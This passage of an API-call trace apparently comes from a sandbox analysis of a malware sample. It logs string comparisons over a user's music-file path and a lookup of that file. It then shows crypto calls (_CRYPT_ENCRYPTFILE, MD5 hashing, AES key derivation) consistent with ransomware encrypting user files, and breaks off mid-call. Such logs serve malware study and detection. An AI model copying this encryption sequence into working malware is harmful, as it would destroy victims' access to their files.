(Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.649] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.649] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0187.649] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.649] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.650] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.650] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.650] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.650] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.650] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.650] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81cfc90, ftCreationTime.dwHighDateTime=0x1d5e1e5, ftLastAccessTime.dwLowDateTime=0xd71f9320, ftLastAccessTime.dwHighDateTime=0x1d5d87d, ftLastWriteTime.dwLowDateTime=0xd71f9320, ftLastWriteTime.dwHighDateTime=0x1d5d87d, nFileSizeHigh=0x0, nFileSizeLow=0x2675, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="OLqMC1.wav", cAlternateFileName="")) returned 0x90ae18 [0187.650] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0187.650] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.650] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.650] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.650] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.651] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0187.651] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.651] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0187.651] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.651] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.651] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0187.651] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.651] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.651] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.651] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.651] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.651] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0187.651] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.651] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0187.653] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.653] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.653] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0187.653] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.653] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.653] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.653] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.653] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.653] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.653] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.653] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.653] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.653] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.653] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.653] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0187.653] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.653] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.653] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.654] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.654] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.654] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.654] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.654] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.654] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.654] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.654] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.654] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.654] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.654] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.654] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.654] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.654] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.654] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0187.654] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.655] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0187.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.655] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.655] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.655] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.655] CryptHashData (hHash=0x90af58, pbData=0x8dec68, dwDataLen=0x19, dwFlags=0x1) returned 1 [0187.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.655] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.655] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.655] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.655] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.656] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.656] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0187.656] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.656] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.656] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.656] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.656] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.656] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0187.656] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.656] CryptDestroyHash (hHash=0x90af58) returned 1 [0187.656] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.656] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.656] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.656] PeekMessageW (in: 